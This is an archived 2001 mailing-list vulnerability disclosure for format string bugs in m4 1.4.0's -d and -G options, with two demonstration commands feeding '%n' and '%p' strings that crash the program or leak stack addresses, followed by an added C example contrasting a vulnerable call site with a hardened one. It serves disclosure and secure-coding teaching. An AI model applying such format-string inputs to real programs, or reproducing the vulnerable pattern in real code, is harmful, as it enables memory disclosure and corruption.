Vulnerability Development mailing list archives

[Helios Security and Administration::another bug in m4]


From: honoriak <EGC () ARGEN NET>
Date: Thu, 22 Feb 2001 18:12:18 +0100

[Helios Security and Administration]

- Program: m4-1.4.0

- Vulnerability: format string bug

- Details: Another format string bug in m4 1.4.0. This time it is with the -d option; another exists in the -G option. In a few days you can see a proof-of-concept exploit, and we will explain the part of the code that permits this.

- Risk: Low (Nothing). It's not setuid. It's useless but it's a vulnerability of course.

- Example:

$ m4 -d "`perl -e 'print " %n"x3'`"
m4: Segmentation fault (core dumped)

$ m4 -G "`perl -e 'print " %p"x4'`"
m4:  0x4010848c 0x4000a610 0xbffffc14 0xbffffbe8: No such file or directory

signed,

            -honoriak
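
The bug class reported in the post above, as an added example that is not part of the original post and is not m4's code: a hypothetical report_error() helper, with a call site that passes a command-line argument as the format string next to the hardened call site that passes it as data. All function names and the SHOW_VULNERABLE macro are assumptions made for illustration.

```c
#include <errno.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical error helper that builds "prog: <message>: <strerror>".
 * The format attribute lets gcc/clang check every call site: with
 * -Wformat -Wformat-security, a non-literal format with no arguments
 * is reported at compile time. */
__attribute__((format(printf, 4, 5)))
static int report_error(char *out, size_t n, int errnum, const char *fmt, ...)
{
    char msg[256];
    va_list ap;

    va_start(ap, fmt);
    vsnprintf(msg, sizeof msg, fmt, ap);   /* fmt is interpreted here */
    va_end(ap);
    return snprintf(out, n, "prog: %s: %s", msg, strerror(errnum));
}

#ifdef SHOW_VULNERABLE
/* Vulnerable call site (compiled only on request): the argument becomes
 * the format, so directives in it are interpreted against arguments
 * that were never passed. */
static int open_failed_vulnerable(char *out, size_t n, const char *arg)
{
    return report_error(out, n, ENOENT, arg);
}
#endif

/* Hardened call site: the format is a literal, the argument is only data. */
static int open_failed(char *out, size_t n, const char *arg)
{
    return report_error(out, n, ENOENT, "%s", arg);
}

int main(void)
{
    char line[512];
    const char *arg = " %p %p %p %p";   /* constructed input */

    open_failed(line, sizeof line, arg);
    puts(line);   /* the directives appear literally in the message */
    return 0;
}
```

Building with -DSHOW_VULNERABLE -Wformat -Wformat-security makes the compiler flag the vulnerable call site.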
